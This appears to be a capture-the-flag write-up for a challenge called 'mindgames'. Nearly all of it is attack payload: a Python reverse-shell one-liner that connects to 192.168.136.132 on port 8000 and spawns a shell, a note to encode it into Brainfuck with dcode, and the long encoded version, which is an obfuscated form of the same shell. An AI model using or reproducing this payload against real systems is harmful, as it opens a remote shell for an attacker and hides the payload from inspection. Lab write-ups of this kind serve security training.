As-64/ctf-writeups/mindgames/writeup.md

 `import os,pty,socket;s=socket.socket();s.connect(("192.168.136.132",8000));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")`

-+ use dcode to encode it into brainfuck
++ use dcode to encode it into brainf*ck

 ```
 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.++++.+++.-.+++.++.<<++.>>-----.++++.<<++++++++++++.>>---.++++.+++++.<<.>>------.----.------------.++++++++.------.+++++++++++++++.<-----------.>-.<++.>.----.------------.++++++++.------.+++++++++++++++.<<++.>>-.----.------------.++++++++.------.+++++++++++++++.<<------.+.>--.>-.<<+++++.>>----------------.++++++++++++.-..---------.--.+++++++++++++++++.<<------..------.>----------.++++++++.-------.----.+++.+++++.++.----------.+++.++.+++.--------.+++.++.-.<.>------.++++++++++++.--------...<+++++++..>+++++++++++.>-------------------------.++++++++++++++++++++.++++.<<+++++.>>---------------.+++++++++++++++++.-----.<<++++.----------.>>+++.<<++++++.>>-------------.+++.+++.-------.+++++++++.+.<<------.+.+++.>>---------.<<---.>>.+++++++++.+++.<<---------.>>------------.<<.>>+++.+++++.<<++++++++.++++++++.----.+++++.-----.++++++.---------.>>-----------------.<.>+++++++++++++++++++.++++.+++++.<<+++++.>>------.---.---------------.++++++++++++++++++++++.---------.<<------.------.>>+++++.-----------.<<.+++++++.